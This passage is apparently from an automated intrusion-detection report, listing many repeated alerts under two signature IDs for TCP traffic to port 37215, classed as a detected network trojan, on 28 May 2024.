            SID:2829579
            Source Port:38442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922308
            SID:2829579
            Source Port:58586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.776990
            SID:2829579
            Source Port:48970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917822
            SID:2829579
            Source Port:41954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764185
            SID:2829579
            Source Port:47926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.654955
            SID:2835222
            Source Port:50198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875599
            SID:2829579
            Source Port:42920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.357438
            SID:2829579
            Source Port:37966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994886
            SID:2829579
            Source Port:57784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.289620
            SID:2835222
            Source Port:42344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.051873
            SID:2835222
            Source Port:59942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.773516
            SID:2835222
            Source Port:49060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808603
            SID:2835222
            Source Port:57984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857658
            SID:2835222
            Source Port:60956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.646545
            SID:2829579
            Source Port:55230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.996281
            SID:2835222
            Source Port:48754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375150
            SID:2835222
            Source Port:32916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999481
            SID:2835222
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052613
            SID:2829579
            Source Port:33018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.859609
            SID:2829579
            Source Port:47868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944835
            SID:2835222
            Source Port:40006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.617566
            SID:2829579
            Source Port:51672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304283
            SID:2829579
            Source Port:41964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.339848
            SID:2835222
            Source Port:58414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.462180
            SID:2829579
            Source Port:60440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866414
            SID:2829579
            Source Port:58382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.945392
            SID:2835222
            Source Port:54856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847236
            SID:2835222
            Source Port:48694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.763377
            SID:2835222
            Source Port:60274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910777
            SID:2835222
            Source Port:46164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618141
            SID:2835222
            Source Port:42906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.092076
            SID:2835222
            Source Port:40926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282853
            SID:2835222
            Source Port:60100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872681
            SID:2829579
            Source Port:40054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376873
            SID:2829579
            Source Port:60024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762128
            SID:2835222
            Source Port:40684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707831
            SID:2829579
            Source Port:38752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.909930
            SID:2829579
            Source Port:40022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058444
            SID:2829579
            Source Port:53598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.022344
            SID:2829579
            Source Port:51694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068461
            SID:2835222
            Source Port:37104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620560
            SID:2835222
            Source Port:44164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003970
            SID:2829579
            Source Port:44250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745972
            SID:2835222
            Source Port:36616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304190
            SID:2829579
            Source Port:35208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469822
            SID:2829579
            Source Port:56998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931240
            SID:2835222
            Source Port:58598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059742
            SID:2835222
            Source Port:41060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827792
            SID:2829579
            Source Port:41608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.701898
            SID:2829579
            Source Port:43306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944164
            SID:2829579
            Source Port:41758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737714
            SID:2835222
            Source Port:49976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915016
            SID:2835222
            Source Port:57592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936273
            SID:2835222
            Source Port:60128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222034
            SID:2829579
            Source Port:55820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737650
            SID:2835222
            Source Port:39650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069071
            SID:2829579
            Source Port:53778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972484
            SID:2829579
            Source Port:34740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764325
            SID:2835222
            Source Port:46394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842698
            SID:2835222
            Source Port:37010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808248
            SID:2829579
            Source Port:48462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932764
            SID:2829579
            Source Port:50202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563436
            SID:2835222
            Source Port:57178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.579061
            SID:2829579
            Source Port:43946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808419
            SID:2829579
            Source Port:56966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.020544
            SID:2829579
            Source Port:48450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491693
            SID:2835222
            Source Port:43170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.942758
            SID:2835222
            Source Port:42526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995296
            SID:2829579
            Source Port:60164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669836
            SID:2835222
            Source Port:51434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765350
            SID:2829579
            Source Port:47518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.861168
            SID:2835222
            Source Port:60902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939309
            SID:2835222
            Source Port:57924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856724
            SID:2829579
            Source Port:46904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769055
            SID:2829579
            Source Port:45030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651179
            SID:2829579
            Source Port:37234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860758
            SID:2829579
            Source Port:34940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020332
            SID:2835222
            Source Port:51640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922433
            SID:2835222
            Source Port:55890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872651
            SID:2829579
            Source Port:47758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760341
            SID:2829579
            Source Port:48792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811902
            SID:2835222
            Source Port:51624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955720
            SID:2835222
            Source Port:53052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887854
            SID:2829579
            Source Port:45666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276981
            SID:2835222
            Source Port:52968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803831
            SID:2835222
            Source Port:35594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910800
            SID:2829579
            Source Port:40890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866395
            SID:2829579
            Source Port:57634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993994
            SID:2835222
            Source Port:54466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275372
            SID:2835222
            Source Port:47814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045340
            SID:2829579
            Source Port:57436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003034
            SID:2835222
            Source Port:41456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058641
            SID:2835222
            Source Port:58878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031004
            SID:2835222
            Source Port:36754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.814609
            SID:2829579
            Source Port:47590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425812
            SID:2835222
            Source Port:47860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740435
            SID:2829579
            Source Port:55172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929968
            SID:2829579
            Source Port:37574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.073297
            SID:2829579
            Source Port:46048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767158
            SID:2835222
            Source Port:52508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473370
            SID:2829579
            Source Port:45026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878620
            SID:2829579
            Source Port:57340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374950
            SID:2835222
            Source Port:40770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809018
            SID:2829579
            Source Port:43312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533728
            SID:2835222
            Source Port:34288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916762
            SID:2835222
            Source Port:34212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.441284
            SID:2829579
            Source Port:38046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852008
            SID:2829579
            Source Port:44768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320738
            SID:2835222
            Source Port:41142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987575
            SID:2835222
            Source Port:45490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.819734
            SID:2829579
            Source Port:51494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736073
            SID:2829579
            Source Port:44088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697345
            SID:2829579
            Source Port:42346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.867876
            SID:2835222
            Source Port:41920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368384
            SID:2835222
            Source Port:58796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378696
            SID:2829579
            Source Port:50736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.978978
            SID:2829579
            Source Port:43814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769022
            SID:2835222
            Source Port:34800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396521
            SID:2829579
            Source Port:54820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840123
            SID:2835222
            Source Port:33342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.812399
            SID:2835222
            Source Port:47876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033324
            SID:2829579
            Source Port:42086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.745690
            SID:2835222
            Source Port:52634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.560500
            SID:2829579
            Source Port:36430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374060
            SID:2835222
            Source Port:60438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057880
            SID:2835222
            Source Port:50942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954671
            SID:2835222
            Source Port:54726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994128
            SID:2829579
            Source Port:48294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948306
            SID:2829579
            Source Port:54336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532341
            SID:2829579
            Source Port:44942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840887
            SID:2829579
            Source Port:52418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910251
            SID:2835222
            Source Port:56650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834189
            SID:2829579
            Source Port:47490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.897924
            SID:2829579
            Source Port:34236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852182
            SID:2829579
            Source Port:50608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.560220
            SID:2835222
            Source Port:49960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575845
            SID:2835222
            Source Port:45634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.926686
            SID:2835222
            Source Port:43200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861235
            SID:2835222
            Source Port:41434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909148
            SID:2829579
            Source Port:36358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.745580
            SID:2829579
            Source Port:47592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.341949
            SID:2835222
            Source Port:52196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764815
            SID:2835222
            Source Port:41828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278187
            SID:2835222
            Source Port:56126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030753
            SID:2835222
            Source Port:48636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877387
            SID:2829579
            Source Port:51518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805167
            SID:2835222
            Source Port:42402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.988405
            SID:2835222
            Source Port:35952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296016
            SID:2835222
            Source Port:40392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004071
            SID:2835222
            Source Port:43452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026016
            SID:2829579
            Source Port:55810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261249
            SID:2835222
            Source Port:58196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855005
            SID:2829579
            Source Port:39380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596994
            SID:2835222
            Source Port:53220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.849709
            SID:2829579
            Source Port:36996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731177
            SID:2829579
            Source Port:45762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.517469
            SID:2829579
            Source Port:50480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827356
            SID:2835222
            Source Port:51276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615609
            SID:2829579
            Source Port:40434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473355
            SID:2829579
            Source Port:59122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722281
            SID:2829579
            Source Port:51788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769802
            SID:2829579
            Source Port:40100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343747
            SID:2835222
            Source Port:46342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500071
            SID:2835222
            Source Port:38218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543413
            SID:2835222
            Source Port:55460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955839
            SID:2835222
            Source Port:60464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352260
            SID:2829579
            Source Port:43688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860990
            SID:2829579
            Source Port:48908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839623
            SID:2829579
            Source Port:57776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669432
            SID:2835222
            Source Port:41928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471562
            SID:2829579
            Source Port:58232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.926620
            SID:2835222
            Source Port:57946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.772005
            SID:2829579
            Source Port:56532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303747
            SID:2835222
            Source Port:58998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995376
            SID:2835222
            Source Port:54674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341202
            SID:2829579
            Source Port:43672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782611
            SID:2829579
            Source Port:56530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842597
            SID:2829579
            Source Port:49338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573403
            SID:2835222
            Source Port:49136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809704
            SID:2829579
            Source Port:55392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.059199
            SID:2835222
            Source Port:48908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.366988
            SID:2835222
            Source Port:32904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870304
            SID:2829579
            Source Port:50828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605095
            SID:2829579
            Source Port:40278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862986
            SID:2829579
            Source Port:56154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754984
            SID:2829579
            Source Port:45120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.625864
            SID:2835222
            Source Port:52454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290296
            SID:2835222
            Source Port:41838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.578816
            SID:2829579
            Source Port:34330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825414
            SID:2829579
            Source Port:57152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398482
            SID:2835222
            Source Port:52166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946790
            SID:2835222
            Source Port:55010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707710
            SID:2829579
            Source Port:51312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938125
            SID:2835222
            Source Port:44680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995572
            SID:2835222
            Source Port:48426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473210
            SID:2835222
            Source Port:37166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873374
            SID:2835222
            Source Port:54652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.492644
            SID:2835222
            Source Port:57300
            Destination Port:37215
